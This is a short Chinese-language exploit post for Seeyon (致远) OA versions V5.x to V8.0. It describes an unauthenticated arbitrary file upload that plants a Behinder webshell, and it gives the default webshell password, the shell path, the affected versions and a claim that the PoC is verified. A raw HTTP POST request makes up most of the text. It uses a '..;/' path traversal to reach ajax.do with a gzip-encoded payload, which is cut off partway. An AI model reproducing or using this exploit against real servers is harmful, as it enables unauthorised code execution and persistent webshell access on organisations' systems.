《某OA前台未授权任意文件上传getshell》
冰蝎3 默认马pass:rebeyond
Webshell地址:127.0.0.1/seeyon/SeeyonUpdate1.jspx
已验证poc真实有效
影响版本:致远OA V8.0致远OA V7.1、V7.1SP1致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3致远OA V6.0、V6.1SP1、V6.1SP2致远OA V5.x
[rihide]POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1 Host: 127.0.0.1 Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=7B6D8C106BD599DB0EF2F2E3B794A4FA; loginPageURL=; login_locale=zh_CN; Content-Type: application/x-www-form-urlencoded Content-Length: 8819 managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00uTK%C2%93%C2%A2H%10%3E%C3%AF%C3%BE%0A%C3%8xxxxxxxxx[/rihide]
